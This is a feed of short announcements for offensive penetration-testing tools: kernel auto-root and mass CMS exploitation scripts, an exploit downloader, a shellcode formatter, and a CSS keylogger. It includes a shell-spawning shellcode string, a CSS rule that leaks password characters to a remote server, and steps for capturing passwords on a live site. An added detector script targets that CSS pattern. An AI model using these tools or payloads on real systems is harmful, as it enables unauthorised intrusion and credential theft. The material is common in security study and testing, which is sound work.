Auto-Root-Exploit – Auto Root Exploit Tool

Auto Root Exploit Tool

Author: Nilotpal Biswas
Facebook: https://www.facebook.com/nilotpal.biswas.73
Twitter: https://twitter.com/nilotpalhacker

USAGE:

for kernel version 2.6 all
    bash autoroot.sh 2
for kernel version 3 all
    bash autoroot.sh 3
for kernel version 4 all
    bash autoroot.sh 4
for freebsd & openbsd all
    bash autoroot.sh bsd
for apple macos all
    bash autoroot.sh app
for kernel 2.6,3,4 bsd & app all
    bash autoroot.sh all

All exploits are suggested by "exploit-db.com" and will be updated according to it.

Link: http://feedproxy.google.com/~r/PentestTools/~3/t-b0Lppu_dw/auto-root-exploit-auto-root-exploit-tool.html

SVScanner – Scanner Vulnerability And Massive Exploit

SVScanner is a tool for scanning and mass exploitation. Our tools target several open source CMSs.

Getting Started with Linux
    git clone https://github.com/radenvodka/SVScanner.git
    cd SVScanner
    php svscanner.php

Getting Started with Windows
Download Xampp (PHP7)
Download SVScanner: https://github.com/radenvodka/SVScanner/releases
and open with cmd:
    php svscanner.php

Systems we recommend:
PHP 7 (version and up)
Install PHP modules: php-cli & php-curl for Linux

Credits
Edo Maland (Powerstager) https://github.com/Screetsec
Jack Wilder, admin at http://www.linuxsec.org

Want to contribute
Send the live target and what exploits are used, then send to maunikah1337@gmail.com

Link: http://feedproxy.google.com/~r/PentestTools/~3/Yisgfs6nPoA/svscanner-scanner-vulnerability-and.html

Texas, T-Mobile, and Jack Daniel – Paul’s Security Weekly #573

In the Security News this week: zero-day Windows exploits, how to hide sensitive files in encrypted containers, the Misfortune Cookie vulnerability returns, and bank robbers faked a Cosmos backend to steal $13.5 million.
The post Texas, T-Mobile, and Jack Daniel – Paul’s Security Weekly #573 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/txHBdnnZi2M/

Getsploit v0.2.2 – Command Line Utility For Searching And Downloading Exploits

Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB, Metasploit, Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.

Python version
Utility was tested on python2.6, python2.7 and python3.6 with SQLite FTS4 support. If you have found any bugs, don’t hesitate to open an issue.

How to use
Install:
    pip install getsploit

Search
    # git clone https://github.com/vulnersCom/getsploit
    # cd getsploit
    # ./getsploit.py wordpress 4.7.0
    Total found exploits: 8
    Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
    +----------------------+--------------------------------+----------------------------------------------------+
    | ID                   | Exploit Title                  | URL                                                |
    +======================+================================+====================================================+
    | PACKETSTORM:141039   | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
    |                      | PHP Code Injection             |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | EDB-ID:41308         | WordPress 4.7.0/4.7.1 Plugin   | https://vulners.com/exploitdb/EDB-ID:41308         |
    |                      | Insert PHP - PHP Code          |                                                    |
    |                      | Injection                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | EDB-ID:41223         | WordPress 4.7.0/4.7.1 -        | https://vulners.com/exploitdb/EDB-ID:41223         |
    |                      | Unauthenticated Content        |                                                    |
    |                      | Injection (PoC)                |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | PACKETSTORM:140893   | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
    |                      | API Privilege Escalation       |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | PACKETSTORM:140902   | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
    |                      | Content Injection / Code       |                                                    |
    |                      | Execution                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | PACKETSTORM:140901   | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
    |                      | Content Injection Proof Of     |                                                    |
    |                      | Concept                        |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | EDB-ID:41224         | WordPress 4.7.0/4.7.1 -        | https://vulners.com/exploitdb/EDB-ID:41224         |
    |                      | Unauthenticated Content        |                                                    |
    |                      | Injection Arbitrary Code       |                                                    |
    |                      | Execution                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | SSV-92637            | WordPress REST API content     | https://vulners.com/seebug/SSV-92637               |
    |                      | injection                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+

Save exploit files
    # ./getsploit.py -m wordpress 4.7.0
    Total found exploits: 8
    Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
    +----------------------+--------------------------------+----------------------------------------------------+
    | ID                   | Exploit Title                  | URL                                                |
    +======================+================================+====================================================+
    | PACKETSTORM:141039   | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
    |                      | PHP Code Injection             |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | EDB-ID:41308         | WordPress 4.7.0/4.7.1 Plugin   | https://vulners.com/exploitdb/EDB-ID:41308         |
    |                      | Insert PHP - PHP Code          |                                                    |
    |                      | Injection                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | EDB-ID:41223         | WordPress 4.7.0/4.7.1 -        | https://vulners.com/exploitdb/EDB-ID:41223         |
    |                      | Unauthenticated Content        |                                                    |
    |                      | Injection (PoC)                |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | PACKETSTORM:140893   | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
    |                      | API Privilege Escalation       |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | PACKETSTORM:140902   | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
    |                      | Content Injection / Code       |                                                    |
    |                      | Execution                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | PACKETSTORM:140901   | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
    |                      | Content Injection Proof Of     |                                                    |
    |                      | Concept                        |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | EDB-ID:41224         | WordPress 4.7.0/4.7.1 -        | https://vulners.com/exploitdb/EDB-ID:41224         |
    |                      | Unauthenticated Content        |                                                    |
    |                      | Injection Arbitrary Code       |                                                    |
    |                      | Execution                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    | SSV-92637            | WordPress REST API content     | https://vulners.com/seebug/SSV-92637               |
    |                      | injection                      |                                                    |
    +----------------------+--------------------------------+----------------------------------------------------+
    # ls
    LICENSE README.md getsploit.py wordpress-470
    # cd wordpress-470
    # ls
    edb-id41223.txt edb-id41224.txt edb-id41308.txt packetstorm140893.txt packetstorm140901.txt packetstorm140902.txt packetstorm141039.txt ssv-92637.txt

Local database
If your Python supports the sqlite3 lib (builtin) you can use the --update and --local commands to download the whole exploit database to your PC. After the update you can perform local offline searches.
    # ./getsploit.py --update
    Downloading getsploit database archive. Please wait, it may take time. Usually around 5-10 minutes.
    219642496/219642496 [100.00%]
    Unpacking database.
    Database download complete. Now you may search exploits using --local key './getsploit.py -l wordpress 4.7'

Link: http://feedproxy.google.com/~r/PentestTools/~3/ik5Cki-nwIQ/getsploit-v022-command-line-utility-for.html

BST (Binary String Toolkit) – Quickly And Easily Convert Binary Strings For All Your Exploit Development Needs

The Binary String Toolkit, or BST for short, is a rather simple utility to convert binary strings to various formats suitable for later inclusion in source code, such as that used to develop exploits in the security field.

Features
Dump files content to standard output in a binary string format.
Convert a plain hexadecimal input to an escaped binary string.
Output a sequence of bad characters for testing proof of concept code.
Limit the width of binary strings for better readability in source codes.
Format output in your favorite programming language’s syntax.
Perform binary variable block indentation.

Dependencies
POSIX C Library
C Compiler
    GCC
    LLVM Clang
GNU Make
Git

Building
To build and install the ‘bstrings’ binary, simply do:
    $ git clone https://github.com/e3prom/bst
    $ cd bst
    $ make
    # by default, bstrings is installed in /usr/local/bin.
    $ make install

Usage
The example below shows how an assembled shellcode can be quickly dumped (-D) to standard output in a hexadecimal escaped (-x) binary string of 16 hexadecimal digits width (or 8 bytes), with Python syntax formatting and an indentation of 4 space characters:
    $ bstrings --verbose -x -D lnx-execve-setreuid-x86_64 -w8 -i 4 --syntax=python
    [*] Convert hexadecimal input to an escaped binary string.
    [+] Binary string width is limited to 8 bytes.
    [+] Output binary string using python language syntax.
    [+] Indentation level set to 4 space character(s).
        shellcode = ""
        shellcode += "\x31\xc0\x48\x89\xc7\x48\x89\xc6"
        shellcode += "\x48\x89\xc2\xb0\x71\x0f\x05\x31"
        shellcode += "\xc0\x50\x48\xbb\x2f\x62\x69\x6e"
        shellcode += "\x2f\x2f\x73\x68\x53\x48\x89\xe7"
        shellcode += "\x50\x48\x89\xe6\x57\x48\x89\xe2"
        shellcode += "\xb0\x3b\x0f\x05"

You can also use bstrings to output an automatically indented bad character sequence, and thus in your favorite programming language:
    $ bstrings --verbose -b -w12 -i 4 --syntax=c -n badchar
    [*] Generating bad character binary string.
    [+] Binary string width is limited to 12 bytes.
        unsigned char badchar[] =
            "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c"
            "\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18"
            "\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24"
            "\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
            "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c"
            "\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48"
            "\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54"
            "\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
            "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c"
            "\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78"
            "\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84"
            "\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
            "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c"
            "\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8"
            "\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4"
            "\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
            "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc"
            "\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8"
            "\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
            "\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
            "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc"
            "\xfd\xfe\xff"

For a list of supported command-line options, simply execute bstrings with the ‘--help’ switch:
    $ bstrings --help
    Usage: ./bstrings [OPTION]...
     Convert input to specified binary string format.

     At least one of the below options must be given:
        -D, --dump-file=FILE    Dump content of file FILE in hexadecimal format
        -x, --hex-escape        Escape input hexadecimal string
        -b, --gen-badchar       Generate a bad character sequence string

     The below switches are optional:
        -f, --file=FILE         Read input from file FILE instead of stdin
        -w, --width=BYTES       Break binary strings to specified length in bytes
        -s, --syntax=LANG       Output variable using language syntax of LANG
        -i, --indent=LENGTH     Perform indentation for given character length
        -n, --var-name=VAR      Specify binary string variable name (verbose)
        -h, --help              Display this help
           --interactive        Enter interactive mode
           --verbose            Enable verbose output
           --version            Print version information

     The below languages are supported (case-sensitive):
        C                       C Programming language
        python                  Python Programming language

Link: http://feedproxy.google.com/~r/PentestTools/~3/FpStPsNMRAw/bst-binary-string-toolkit-quickly-and.html

Metateta – Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit

Metateta
Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit
For faster pen testing of large networks

What You Can Do
Scan with all Metasploit modules for a specific network protocol such as smb, smtp, snmp
Run all Auxiliary modules against a specific network protocol
Run all possible Metasploit exploits for a specific network protocol (this is not recommended for real pen testing)
Run against one target, a network, or even a text file with targets

Usage examples
    run.py -R 192.168.1.15-255 -p smb -x exploit
    run.py -r 192.168.1.15 -p smtp -x scan
    run.py -f hosts.txt -p smb -x auxiliary

Hossam Mohamed – @wazehell

Link: http://feedproxy.google.com/~r/PentestTools/~3/JS2U_1rLV1I/metateta-automated-tool-for-scanning.html

CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

Chrome extension and Express server that exploits keylogging abilities of CSS.

To use

Setup Chrome extension
Download repository:
    git clone https://github.com/maxchehab/CSS-Keylogging
Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox; the menu’s icon is three horizontal bars, and select Extensions under the More Tools menu to get to the same place).
Ensure that the Developer mode checkbox in the top right-hand corner is checked.
Click Load unpacked extension… to pop up a file-selection dialog.
Select the css-keylogger-extension in the directory in which you downloaded this repository.

Setup Express server
    yarn
    yarn start

Haxking l33t passw0rds
Open a website that uses a controlled component framework such as React. https://instagram.com.
Press the extension C on the top right of any webpage.
Type your password.
Your password should be captured by the express server.

How it works
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all inputs with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

    input[type="password"][value$="a"] {
      background-image: url("http://localhost:3000/a");
    }

Using a simple script one can create a css file that will send a custom request for every ASCII character.
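The selector pattern described under "How it works" can be found statically in a stylesheet. The following is an added example, not code from the CSS-Keylogging repository: it flags rules that select on an input's value attribute and also fetch a remote url(). The function names and the sample stylesheet are assumptions constructed for illustration.

```javascript
// Added example: static check for the exfiltration pattern described above.
// Matches [value$=...], [value^=...], [value*=...] and similar selectors.
const VALUE_SELECTOR =
  /\[\s*value\s*([$^*~|]?=)\s*(?:"([^"]*)"|'([^']*)'|([^\]\s]+))\s*(?:[is]\s*)?\]/i;
const URL_FN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]+))\s*\)/gi;

// Return every rule that selects on an input's value AND fetches a remote URL.
function findExfilRules(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g; // innermost rules, so @media bodies are covered
  const findings = [];
  let m;
  while ((m = ruleRe.exec(css)) !== null) {
    const selector = m[1].trim();
    const sel = VALUE_SELECTOR.exec(selector);
    if (!sel) continue;
    const remote = [...m[2].matchAll(URL_FN)]
      .map((u) => u[1] || u[2] || u[3])
      .filter((u) => /^(https?:)?\/\//i.test(u)); // absolute or protocol-relative
    if (remote.length > 0) {
      findings.push({ selector, operator: sel[1], matched: sel[2] || sel[3] || sel[4], urls: remote });
    }
  }
  return findings;
}

// Group findings by destination host; many distinct values to one host is the tell.
function summarizeByHost(findings) {
  const hosts = new Map();
  for (const f of findings) {
    for (const u of f.urls) {
      const host = new URL(u, "http://base.invalid").host;
      if (!hosts.has(host)) hosts.set(host, new Set());
      hosts.get(host).add(f.matched);
    }
  }
  return [...hosts].map(([host, values]) => ({ host, distinctValues: values.size }));
}

// Constructed sample: the first two rules follow the pattern quoted on the page.
const SAMPLE_CSS = `
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
input[type="password"][value$="b"] { background-image: url("http://localhost:3000/b"); }
input[type="password"] { border: 1px solid #ccc; }
a[href$=".pdf"] { background-image: url("/icons/pdf.png"); }
@media print { input[value^="x"] { background: url(/img/local.png); } }
`;

console.log(summarizeByHost(findExfilRules(SAMPLE_CSS)));
```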

Link: http://feedproxy.google.com/~r/PentestTools/~3/1jiciHQ1uSs/css-keylogger-chrome-extension-and.html

GyoiThon – A Growing Penetration Test Tool Using Machine Learning

GyoiThon is a growing penetration test tool using Machine Learning.

GyoiThon identifies the software installed on web server (OS, Middleware, Framework, CMS, etc…) based on the learning data. After that, it executes valid exploits for the identified software using Metasploit. Finally, it generates reports of scan results. GyoiThon executes the above processing automatically.

Processing steps
GyoiThon executes the above "Step1" – "Step4" fully automatically.
User’s only operation is to input the top URL of the target web server in GyoiThon.
It is very easy!
You can identify vulnerabilities of the web servers without taking time and effort.

Processing flow

Step 1. Gather HTTP responses.
GyoiThon gathers several HTTP responses of target website while crawling.
The following are examples of HTTP responses gathered by GyoiThon.

Example.1
    HTTP/1.1 200 OK
    Date: Tue, 06 Mar 2018 03:01:57 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Etag: "409ed-183-53c5f732641c0"
    Content-Length: 15271

    …snip…

Example.2
    HTTP/1.1 200 OK
    Date: Tue, 06 Mar 2018 06:56:17 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;
    Content-Length: 37496

    …snip…

Example.3
    HTTP/1.1 200 OK
    Date: Tue, 06 Mar 2018 04:19:19 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 11819

    …snip…